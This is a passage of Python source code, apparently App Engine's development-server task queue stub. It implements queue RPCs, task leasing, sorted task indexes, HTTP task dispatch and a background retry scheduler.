self.bucket_capacity = request.bucket_capacity()
if request.has_user_specified_rate():
self.user_specified_rate = request.user_specified_rate()
else:
self.user_specified_rate = None
if request.has_retry_parameters():
self.retry_parameters = request.retry_parameters()
else:
self.retry_parameters = None
if request.has_max_concurrent_requests():
self.max_concurrent_requests = request.max_concurrent_requests()
else:
self.max_concurrent_requests = None
self.queue_mode = request.mode()
if request.has_acl():
self.acl = request.acl()
else:
self.acl = None
@_WithLock
def FetchQueues_Rpc(self, request, response):
"""Fills out a queue message on the provided TaskQueueFetchQueuesResponse.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
response_queue = response.add_queue()
response_queue.set_queue_name(self.queue_name)
response_queue.set_bucket_refill_per_second(
self.bucket_refill_per_second)
response_queue.set_bucket_capacity(self.bucket_capacity)
if self.user_specified_rate is not None:
response_queue.set_user_specified_rate(self.user_specified_rate)
if self.max_concurrent_requests is not None:
response_queue.set_max_concurrent_requests(
self.max_concurrent_requests)
if self.retry_parameters is not None:
response_queue.retry_parameters().CopyFrom(self.retry_parameters)
response_queue.set_paused(self.paused)
if self.queue_mode is not None:
response_queue.set_mode(self.queue_mode)
if self.acl is not None:
response_queue.mutable_acl().CopyFrom(self.acl)
@_WithLock
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
assert not request.has_start_tag()
if request.has_start_eta_usec():
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name(),
eta=request.start_eta_usec())
else:
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name())
for task in tasks:
response.add_task().MergeFrom(task)
@_WithLock
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
task_name = request.task_name()
pos = self._LocateTaskByName(task_name)
if pos is None:
if task_name in self.task_name_archive:
error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
raise apiproxy_errors.ApplicationError(error)
_, task = self._sorted_by_name[pos]
response.mutable_task().add_task().CopyFrom(task)
@_WithLock
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store. We mimic a 1/20 chance of a
TRANSIENT_ERROR when the request has an app_id.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
for taskname in request.task_name_list():
if request.has_app_id() and random.random() <= 0.05:
response.add_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
else:
response.add_result(self._DeleteNoAcquireLock(taskname))
def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec,
tag=None):
assert self._lock.locked()
if group_by_tag and tag:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, None, None,),
end_key=(tag, now_eta_usec, None,),
max_rows=max_rows)
elif group_by_tag:
tasks = self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
if not tasks:
return []
if tasks[0].has_tag():
tag = tasks[0].tag()
return self._QueryAndOwnTasksGetTaskList(
max_rows, True, now_eta_usec, tag)
else:
return [task for task in tasks if not task.has_tag()]
else:
return self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
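# When group_by_tag is set without an explicit tag, the tag of the oldest
# leasable task decides the group: if that task is tagged the scan is re-run
# restricted to its tag, otherwise only untagged tasks are returned.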
@_WithLock
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
max_tasks = request.max_tasks()
if max_tasks <= 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
if request.has_tag() and not request.group_by_tag():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST,
'Tag specified, but group_by_tag was not.')
now_eta_usec = _SecToUsec(time.time())
tasks = self._QueryAndOwnTasksGetTaskList(
max_tasks, request.group_by_tag(), now_eta_usec, request.tag())
tasks_to_delete = []
for task in tasks:
retry = Retry(task, self)
if not retry.CanRetry(task.retry_count() + 1, 0):
logging.warning(
'Task %s in queue %s cannot be leased again after %d leases.',
task.task_name(), self.queue_name, task.retry_count())
tasks_to_delete.append(task)
continue
self._PostponeTaskNoAcquireLock(
task, now_eta_usec + _SecToUsec(lease_seconds))
task_response = response.add_task()
task_response.set_task_name(task.task_name())
task_response.set_eta_usec(task.eta_usec())
task_response.set_retry_count(task.retry_count())
if task.has_tag():
task_response.set_tag(task.tag())
task_response.set_body(task.body())
for task in tasks_to_delete:
self._DeleteNoAcquireLock(task.task_name())
@_WithLock
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
if self.paused:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
pos = self._LocateTaskByName(request.task_name())
if pos is None:
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
_, task = self._sorted_by_name[pos]
if task.eta_usec() != request.eta_usec():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
now_usec = _SecToUsec(time.time())
if task.eta_usec() < now_usec:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
future_eta_usec = now_usec + _SecToUsec(lease_seconds)
self._PostponeTaskNoAcquireLock(
task, future_eta_usec, increase_retries=False)
response.set_updated_eta_usec(future_eta_usec)
@_WithLock
def IncRetryCount(self, task_name):
"""Increment the retry count of a task by 1.
Args:
task_name: The name of the task to update.
"""
pos = self._LocateTaskByName(task_name)
assert pos is not None, (
'Task does not exist when trying to increase retry count.')
task = self._sorted_by_name[pos][1]
self._IncRetryCount(task)
def _IncRetryCount(self, task):
assert self._lock.locked()
retry_count = task.retry_count()
task.set_retry_count(retry_count + 1)
task.set_execution_count(task.execution_count() + 1)
@_WithLock
def GetTasksAsDicts(self):
"""Gets all of the tasks in this queue.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value'),
('X-AppEngine-QueueName', 'update-queue'),
('X-AppEngine-TaskName', 'task-123'),
('X-AppEngine-TaskExecutionCount', '1'),
('X-AppEngine-TaskRetryCount', '1'),
('X-AppEngine-TaskETA', '1234567890.123456'),
('X-AppEngine-Development-Payload', '1'),
('X-AppEngine-TaskPreviousResponse', '300'),
('Content-Length', '0'),
('Content-Type', 'application/octet-stream')]}, ...]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
tasks = []
now = datetime.datetime.utcnow()
for _, _, task_response in self._sorted_by_eta:
tasks.append(QueryTasksResponseToDict(
self.queue_name, task_response, now))
return tasks
@_WithLock
def GetTaskAsDict(self, task_name):
"""Gets a specific task from this queue.
Returns:
A dictionary containing one task's attributes. E.g.
{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value'),
('X-AppEngine-QueueName', 'update-queue'),
('X-AppEngine-TaskName', 'task-123'),
('X-AppEngine-TaskExecutionCount', '1'),
('X-AppEngine-TaskRetryCount', '1'),
('X-AppEngine-TaskETA', '1234567890.123456'),
('X-AppEngine-Development-Payload', '1'),
('X-AppEngine-TaskPreviousResponse', '300'),
('Content-Length', '0'),
('Content-Type', 'application/octet-stream')]}
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name)
if not task_responses:
return
task_response, = task_responses
if task_response.task_name() != task_name:
return
now = datetime.datetime.utcnow()
return QueryTasksResponseToDict(self.queue_name, task_response, now)
@_WithLock
def PurgeQueue(self):
"""Removes all content from the queue."""
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
@_WithLock
def _GetTasks(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
return self._GetTasksNoAcquireLock()
def _GetTasksNoAcquireLock(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
assert self._lock.locked()
tasks = []
for eta, task_name, task in self._sorted_by_eta:
tasks.append(task)
return tasks
def _InsertTask(self, task):
"""Insert a task into the store, keeps lists sorted.
Args:
task: the new task.
"""
assert self._lock.locked()
eta = task.eta_usec()
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (eta, name, task))
if task.has_tag():
bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task))
bisect.insort_left(self._sorted_by_name, (name, task))
self.task_name_archive.add(name)
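# The three indexes hold parallel entries for each task, always referencing
# the same TaskQueueQueryTasksResponse_Task instance:
#   _sorted_by_name: (name, task)
#   _sorted_by_eta:  (eta_usec, name, task)
#   _sorted_by_tag:  (tag, eta_usec, name, task)   (tagged tasks only)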
@_WithLock
def RunTaskNow(self, task):
"""Change the eta of a task to now.
Args:
task: The TaskQueueQueryTasksResponse_Task to run now. This must be
stored in this queue (otherwise an AssertionError is raised).
"""
self._PostponeTaskNoAcquireLock(task, 0, increase_retries=False)
@_WithLock
def PostponeTask(self, task, new_eta_usec):
"""Postpone the task to a future time and increment the retry count.
Args:
task: The TaskQueueQueryTasksResponse_Task to postpone. This must be
stored in this queue (otherwise an AssertionError is raised).
new_eta_usec: The new eta to set on the task. This must be greater than
the current eta on the task.
"""
assert new_eta_usec > task.eta_usec()
self._PostponeTaskNoAcquireLock(task, new_eta_usec)
def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
increase_retries=True):
assert self._lock.locked()
if increase_retries:
self._IncRetryCount(task)
name = task.task_name()
eta = task.eta_usec()
assert self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), task)
if task.has_tag():
assert self._RemoveTaskFromIndex(
self._sorted_by_tag, (task.tag(), eta, name, None), task)
self._PostponeTaskInsertOnly(task, new_eta_usec)
def _PostponeTaskInsertOnly(self, task, new_eta_usec):
assert self._lock.locked()
task.set_eta_usec(new_eta_usec)
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
if task.has_tag():
tag = task.tag()
bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))
@_WithLock
def Lookup(self, maximum, name=None, eta=None):
"""Lookup a number of sorted tasks from the store.
If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
then 'name'. Otherwise they are sorted by 'name'. We need to be able to
sort by 'eta' and 'name' because tasks can have identical eta. If you had
20 tasks with the same ETA, you wouldn't be able to page past them, since
the 'next eta' would give the first one again. Names are unique, though.
Args:
maximum: the maximum number of tasks to return.
name: a task name to start with.
eta: an eta to start with.
Returns:
A list of up to 'maximum' tasks.
Raises:
ValueError: if the task store gets corrupted.
"""
return self._LookupNoAcquireLock(maximum, name, eta)
def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
"""Return the result of a 'scan' over the given index.
The scan is inclusive of start_key and exclusive of end_key. It returns at
most max_rows from the index.
Args:
index: One of the index lists, eg self._sorted_by_tag.
start_key: The key to start at.
end_key: Optional end key.
max_rows: The maximum number of rows to yield.
Returns:
a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from
the given index, in sorted order.
"""
assert self._lock.locked()
start_pos = bisect.bisect_left(index, start_key)
end_pos = INF
if end_key is not None:
end_pos = bisect.bisect_left(index, end_key)
if max_rows is not None:
end_pos = min(end_pos, start_pos + max_rows)
end_pos = min(end_pos, len(index))
tasks = []
for pos in xrange(start_pos, end_pos):
tasks.append(index[pos][-1])
return tasks
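# The scan keys rely on Python 2 tuple ordering, where None sorts before any
# string or number: a partial key such as (eta, None) therefore falls just
# before every real (eta, name, task) entry with that eta, letting callers say
# "from the start of this eta" or "up to, but not including, this eta" without
# knowing any task names.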
def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
assert self._lock.locked()
if tag is not None:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, eta, name,),
end_key=('%s\x00' % tag, None, None,),
max_rows=maximum)
elif eta is not None:
return self._IndexScan(self._sorted_by_eta,
start_key=(eta, name,),
max_rows=maximum)
else:
return self._IndexScan(self._sorted_by_name,
start_key=(name,),
max_rows=maximum)
@_WithLock
def Count(self):
"""Returns the number of tasks in the store."""
return len(self._sorted_by_name)
@_WithLock
def OldestTask(self):
"""Returns the task with the oldest eta in the store."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][2]
return None
@_WithLock
def Oldest(self):
"""Returns the oldest eta in the store, or None if no tasks."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][0]
return None
def _LocateTaskByName(self, task_name):
"""Locate the index of a task in _sorted_by_name list.
If the task does not exist in the list, return None.
Args:
task_name: Name of task to be located.
Returns:
Index of the task in _sorted_by_name list if task exists,
None otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
if (pos >= len(self._sorted_by_name) or
self._sorted_by_name[pos][0] != task_name):
return None
return pos
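# Entries in _sorted_by_name are (name, task) pairs, and the one-element key
# (task_name,) sorts immediately before them, so bisect_left lands on the
# matching entry when it exists; the equality check above separates a hit
# from a mere insertion point.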
@_WithLock
def Add(self, request, now):
"""Inserts a new task into the store.
Args:
request: A taskqueue_service_pb.TaskQueueAddRequest.
now: A datetime.datetime object containing the current time in UTC.
Raises:
apiproxy_errors.ApplicationError: If a task with the same name is already
in the store, or the task is tombstoned.
"""
if self._LocateTaskByName(request.task_name()) is not None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
now_sec = calendar.timegm(now.utctimetuple())
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(request.task_name())
task.set_eta_usec(request.eta_usec())
task.set_creation_time_usec(_SecToUsec(now_sec))
task.set_retry_count(0)
task.set_method(request.method())
if request.has_url():
task.set_url(request.url())
for keyvalue in request.header_list():
header = task.add_header()
header.set_key(keyvalue.key())
header.set_value(keyvalue.value())
if request.has_description():
task.set_description(request.description())
if request.has_body():
task.set_body(request.body())
if request.has_crontimetable():
task.mutable_crontimetable().set_schedule(
request.crontimetable().schedule())
task.mutable_crontimetable().set_timezone(
request.crontimetable().timezone())
if request.has_retry_parameters():
task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
if request.has_tag():
task.set_tag(request.tag())
self._InsertTask(task)
@_WithLock
def Delete(self, name):
"""Deletes a task from the store by name.
Args:
name: the name of the task to delete.
Returns:
TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
TaskQueueServiceError.TOMBSTONED_TASK: if the task has already been deleted.
TaskQueueServiceError.OK: otherwise.
"""
return self._DeleteNoAcquireLock(name)
def _RemoveTaskFromIndex(self, index, index_tuple, task):
"""Remove a task from the specified index.
Args:
index: The index list that needs to be mutated.
index_tuple: The tuple to search for in the index.
task: The task instance that is expected to be stored at this location.
Returns:
True if the task was successfully removed from the index, False otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(index, index_tuple)
if index[pos][-1] is not task:
logging.debug('Expected %s, found %s', task, index[pos][-1])
return False
index.pop(pos)
return True
def _DeleteNoAcquireLock(self, name):
assert self._lock.locked()
pos = self._LocateTaskByName(name)
if pos is None:
if name in self.task_name_archive:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
old_task = self._sorted_by_name.pop(pos)[-1]
eta = old_task.eta_usec()
if not self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
if old_task.has_tag():
tag = old_task.tag()
if not self._RemoveTaskFromIndex(
self._sorted_by_tag, (tag, eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
return taskqueue_service_pb.TaskQueueServiceError.OK
@_WithLock
def Populate(self, num_tasks):
"""Populates the store with a number of tasks.
Args:
num_tasks: the number of tasks to insert.
"""
def RandomTask():
"""Creates a new task and randomly populates values."""
assert self._lock.locked()
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(''.join(random.choice(string.ascii_lowercase)
for x in range(20)))
task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10),
_SecToUsec(600)))
task.set_creation_time_usec(min(now_usec, task.eta_usec()) -
random.randint(0, _SecToUsec(20)))
task.set_url(random.choice(['/a', '/b', '/c', '/d']))
if random.random() < 0.2:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST)
task.set_body('A' * 2000)
else:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET)
retry_count = max(0, random.randint(-10, 5))
task.set_retry_count(retry_count)
task.set_execution_count(retry_count)
if random.random() < 0.3:
random_headers = [('nexus', 'one'),
('foo', 'bar'),
('content-type', 'text/plain'),
('from', 'user@email.com')]
for _ in xrange(random.randint(1, 4)):
elem = random.randint(0, len(random_headers) - 1)
key, value = random_headers.pop(elem)
header_proto = task.add_header()
header_proto.set_key(key)
header_proto.set_value(value)
return task
now_usec = _SecToUsec(time.time())
for _ in range(num_tasks):
self._InsertTask(RandomTask())
class _TaskExecutor(object):
"""Executor for a task object.
Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the
httplib library to send it to the http server.
"""
def __init__(self, default_host, request_data):
"""Constructor.
Args:
default_host: a string to use as the host/port to connect to if the host
header is not specified in the task.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
self._default_host = default_host
self._request_data = request_data
def _HeadersFromTask(self, task, queue):
"""Constructs the http headers for the given task.
This function will remove special headers (values in BUILT_IN_HEADERS) and
add the taskqueue headers.
Args:
task: The task, a TaskQueueQueryTasksResponse_Task instance.
queue: The queue that this task belongs to, a _Queue instance.
Returns:
A list of tuples containing the http header and value. There
may be multiple entries with the same key.
"""
headers = []
for header in task.header_list():
header_key_lower = header.key().lower()
if header_key_lower == 'host' and queue.target is not None:
headers.append(
(header.key(), '.'.join([queue.target, self._default_host])))
elif header_key_lower not in BUILT_IN_HEADERS:
headers.append((header.key(), header.value()))
headers.append(('X-AppEngine-QueueName', queue.queue_name))
headers.append(('X-AppEngine-TaskName', task.task_name()))
headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task.eta_usec()))))
headers.append(('X-AppEngine-Fake-Is-Admin', '1'))
headers.append(('Content-Length', str(len(task.body()))))
if (task.has_body() and 'content-type' not in
[key.lower() for key, _ in headers]):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task.execution_count())))
if task.has_runlog() and task.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task.runlog().response_code())))
return headers
def ExecuteTask(self, task, queue):
"""Construct a http request from the task and dispatch it.
Args:
task: The task to convert to a http request and then send. An instance of
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task
queue: The queue that this task belongs to. An instance of _Queue.
Returns:
Http Response code from the task's execution, 0 if an exception occurred.
"""
method = task.RequestMethod_Name(task.method())
headers = self._HeadersFromTask(task, queue)
dispatcher = self._request_data.get_dispatcher()
try:
response = dispatcher.add_request(method, task.url(), headers,
task.body() if task.has_body() else '',
'0.1.0.2')
except request_info.ModuleDoesNotExistError:
logging.exception('Failed to dispatch task')
return 0
return int(response.status.split(' ', 1)[0])
class _BackgroundTaskScheduler(object):
"""The task scheduler class.
This class is designed to be run in a background thread.
Note: There must not be more than one instance of _BackgroundTaskScheduler per
group.
"""
def __init__(self, group, task_executor, retry_seconds, **kwargs):
"""Constructor.
Args:
group: The group that we will automatically execute tasks from. Must be an
instance of _Group.
task_executor: The class used to convert a task into a http request. Must
be an instance of _TaskExecutor.
retry_seconds: The number of seconds to delay a task by if its execution
fails.
_get_time: a callable that returns the current time in seconds since the
epoch. This argument may only be passed in by keyword. If unset, use
time.time.
"""
self._group = group
self._should_exit = False
self._next_wakeup = INF
self._event = threading.Event()
self._wakeup_lock = threading.Lock()
self.task_executor = task_executor
self.default_retry_seconds = retry_seconds
self._get_time = kwargs.pop('_get_time', time.time)
if kwargs:
raise TypeError('Unknown parameters: %s' % ', '.join(kwargs))
def UpdateNextEventTime(self, next_event_time):
"""Notify the TaskExecutor of the closest event it needs to process.
Args:
next_event_time: The time of the event in seconds since the epoch.
"""
with self._wakeup_lock:
if next_event_time < self._next_wakeup:
self._next_wakeup = next_event_time
self._event.set()
def Shutdown(self):
"""Request this TaskExecutor to exit."""
self._should_exit = True
self._event.set()
def _ProcessQueues(self):
with self._wakeup_lock:
self._next_wakeup = INF
now = self._get_time()
queue, task = self._group.GetNextPushTask()
while task and _UsecToSec(task.eta_usec()) <= now:
if task.retry_count() == 0:
task.set_first_try_usec(_SecToUsec(now))
response_code = self.task_executor.ExecuteTask(task, queue)
if response_code:
task.mutable_runlog().set_response_code(response_code)
else:
logging.error(
'An error occurred while sending the task "%s" '
'(Url: "%s") in queue "%s". Treating as a task error.',
task.task_name(), task.url(), queue.queue_name)
now = self._get_time()
if 200 <= response_code < 300:
queue.Delete(task.task_name())
else:
retry = Retry(task, queue)
age_usec = _SecToUsec(now) - task.first_try_usec()
if retry.CanRetry(task.retry_count() + 1, age_usec):
retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1)
logging.warning(
'Task %s failed to execute. This task will retry in %.3f seconds',
task.task_name(), _UsecToSec(retry_usec))
queue.PostponeTask(task, _SecToUsec(now) + retry_usec)
else:
logging.warning(
'Task %s failed to execute. The task has no remaining retries. '
'Failing permanently after %d retries and %d seconds',
task.task_name(), task.retry_count(), _UsecToSec(age_usec))
queue.Delete(task.task_name())
queue, task = self._group.GetNextPushTask()
if task:
with self._wakeup_lock:
eta = _UsecToSec(task.eta_usec())
if eta < self._next_wakeup:
self._next_wakeup = eta
def _Wait(self):
"""Block until we need to process a task or we need to exit."""
now = self._get_time()
while not self._should_exit and self._next_wakeup > now:
timeout = self._next_wakeup - now
self._event.wait(timeout)
self._event.clear()
now = self._get_time()
def MainLoop(self):
"""The main loop of the scheduler."""
while not self._should_exit:
self._ProcessQueues()
self._Wait()
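# Intended usage (see TaskQueueServiceStub.StartBackgroundExecution below):
# run MainLoop on a daemon thread, feed it wake-up times through
# UpdateNextEventTime as tasks are added, and call Shutdown to make the loop
# exit after its current pass.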
class TaskQueueServiceStub(apiproxy_stub.APIProxyStub):
"""Python only task queue service stub.
This stub executes tasks when enabled by using the dev_appserver's AddEvent
capability. When task running is disabled this stub will store tasks for
display on a console, where the user may manually execute the tasks.
"""
def __init__(self,
service_name='taskqueue',
root_path=None,
auto_task_running=False,
task_retry_seconds=30,
_all_queues_valid=False,
default_http_server=None,
_testing_validate_state=False,
request_data=None):
"""Constructor.
Args:
service_name: Service name expected for all calls.
root_path: Root path to the directory of the application which may contain
a queue.yaml file. If None, then it's assumed no queue.yaml file is
available.
auto_task_running: When True, the dev_appserver should automatically
run tasks after they are enqueued.
task_retry_seconds: How long to wait between task executions after a
task fails.
default_http_server: The host and port ('host:port') that tasks are
dispatched to when a task does not specify its own host header.
_testing_validate_state: Should this stub and all of its _Groups (and
thus all of its _Queues) validate their state after each
operation? This should only be used during testing of the
taskqueue_stub.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
super(TaskQueueServiceStub, self).__init__(
service_name, max_request_size=MAX_REQUEST_SIZE,
request_data=request_data)
self._queues = {}
self._all_queues_valid = _all_queues_valid
self._root_path = root_path
self._testing_validate_state = _testing_validate_state
self._queues[None] = _Group(
self._ParseQueueYaml, app_id=None,
_all_queues_valid=_all_queues_valid,
_update_newest_eta=self._UpdateNextEventTime,
_testing_validate_state=self._testing_validate_state)
self._auto_task_running = auto_task_running
self._started = False
self._task_scheduler = _BackgroundTaskScheduler(
self._queues[None], _TaskExecutor(default_http_server,
self.request_data),
retry_seconds=task_retry_seconds)
self._yaml_last_modified = None
def StartBackgroundExecution(self):
"""Start automatic task execution."""
if not self._started and self._auto_task_running:
task_scheduler_thread = threading.Thread(
target=self._task_scheduler.MainLoop)
task_scheduler_thread.setDaemon(True)
task_scheduler_thread.start()
self._started = True
def Shutdown(self):
"""Requests the task scheduler to shutdown."""
self._task_scheduler.Shutdown()
def _ParseQueueYaml(self):
"""Loads the queue.yaml file and parses it.
Returns:
None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object
populated from the queue.yaml.
"""
if hasattr(self, 'queue_yaml_parser'):
return self.queue_yaml_parser(self._root_path)
if self._root_path is None:
return None
for queueyaml in ('queue.yaml', 'queue.yml'):
try:
path = os.path.join(self._root_path, queueyaml)
modified = os.stat(path).st_mtime
if self._yaml_last_modified and self._yaml_last_modified == modified:
return self._last_queue_info
fh = open(path, 'r')
except (IOError, OSError):
continue
try:
queue_info = queueinfo.LoadSingleQueue(fh)
self._last_queue_info = queue_info
self._yaml_last_modified = modified
return queue_info
finally:
fh.close()
return None
def _UpdateNextEventTime(self, callback_time):
"""Enqueue a task to be automatically scheduled.
Note: If auto task running is disabled, this function is a no-op.
Args:
callback_time: The earliest time this task may be run, in seconds since
the epoch.
"""
self._task_scheduler.UpdateNextEventTime(callback_time)
def _GetGroup(self, app_id=None):
"""Get the _Group instance for app_id, creating a new one if needed.
Args:
app_id: The app id in question. Note: This field is not validated.
"""
if app_id not in self._queues:
self._queues[app_id] = _Group(
app_id=app_id, _all_queues_valid=self._all_queues_valid,
_testing_validate_state=self._testing_validate_state)
return self._queues[app_id]
def _Dynamic_Add(self, request, response):
"""Add a single task to a queue.
This method is a wrapper around the BulkAdd RPC request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueAddResponse. See
taskqueue_service.proto.
"""
bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse()
bulk_request.add_add_request().CopyFrom(request)
self._Dynamic_BulkAdd(bulk_request, bulk_response)
assert bulk_response.taskresult_size() == 1
result = bulk_response.taskresult(0).result()
if result != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(result)
elif bulk_response.taskresult(0).has_chosen_task_name():
response.set_chosen_task_name(
bulk_response.taskresult(0).chosen_task_name())
def _Dynamic_BulkAdd(self, request, response):
"""Add many tasks to a queue using a single request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
assert request.add_request_size(), 'taskqueue should prevent empty requests'
self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc(
request, response)
def GetQueues(self):
"""Gets all the application's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12}, ...]
The list of queues always includes the default queue.
"""
return self._GetGroup().GetQueuesAsDicts()
def GetTasks(self, queue_name):
"""Gets a queue's tasks.
Args:
queue_name: Queue's name to return tasks for.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
